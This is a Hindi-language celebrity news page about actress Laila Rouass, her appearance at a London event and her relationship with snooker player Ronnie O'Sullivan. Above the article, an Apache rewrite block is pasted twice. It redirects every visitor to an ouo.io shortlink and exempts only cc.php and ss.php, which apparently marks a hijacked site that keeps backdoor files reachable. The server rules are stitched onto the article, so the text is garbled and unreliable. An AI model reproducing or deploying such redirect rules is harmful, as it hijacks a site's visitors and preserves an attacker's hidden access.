
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 710
नई दिल्ली। करीब 14 साल पहले एक्ट्रेस लैला रुआस ने टीवी सीरियल ‘फुटबॉलर लाइफ’ से काफी नाम कमाया। इस सीरियल में अम्बर गेट्स नाम का उनका किरदार काफी पसंद किया गया। शुक्रवार को लंदन में एक कार्यक्रम में इस सीरियल की कई एक्ट्रेसेस को इनवाइट किया गया। इस दौरान सभी की नजरें लैला पर टिकी थीं। लैला इंग्लैंड के 42 वर्षीय बिलियर्डस खिलाड़ी रॉनी ओसुलिवेन की प्रेमिका है। दोनों कई मौकों पर साथ नजर आते हैं। इनके इंस्टा अकाउंट पर भी एक-दूसरे की फोटोज की भरमार रहती है। लैला जब कार्यक्रम में पहुंचीं तो उन्हें देखकर सभी हैरान रह गए। 46 साल की होने के बावजूद लैला यंग लड़कियों को मात देती नजर आ रही थीं। सफेद रंग की ड्रेस में उनका स्लिम फिगर कमाल ढा रहा था। यही नहीं, उनके चेहरे पर किसी भी तरह की सिलवटें नहीं थीं और उस पर उनकी मनमोहक मुस्कान ने सभी का दिल जीत लिया। इस दौरान फोटोग्राफरों को उन्होंने कई पोज भी दिए। बता दें कि लैला ने बॉलीवुड में भी काम किया है। वो राहुल बोस के साथ फिल्म स्पिट्स वाइड ओपन और नंदिता दास के साथ फिल्म बवंडर में नजर आई थीं। लैला ने इस कार्यक्रम की कई फोटो सोशल साइट पर पोस्ट कीं। इसके बाद तो उनके दीवानों ने लैला की तारीफ में कसीदे गढ़ना शुरू कर दिया। कुछ ने इस एक्ट्रेस से उनकी खूबसूरती का राज भी जानना चाहा।
एक फैन ने लिखा, उम्र को मात देने में लैला का कोई सानी नहीं है। शायद यही वजह है कि उम्र में चार साल बड़ी होने के बावजूद रॉनी उन्हें अपना दिल हार बैठे। दोनों के बीच 2012 में अफेयर की शुरुआत हुई थी, जो अभी जारी है। इससे पहले, लैला का जेम्स पैट्री और नासिर खान से भी अफेयर रह चुका है। लैला ने 1990 में अबसेलम रुआस से शादी की थी जो 2003 तक चली।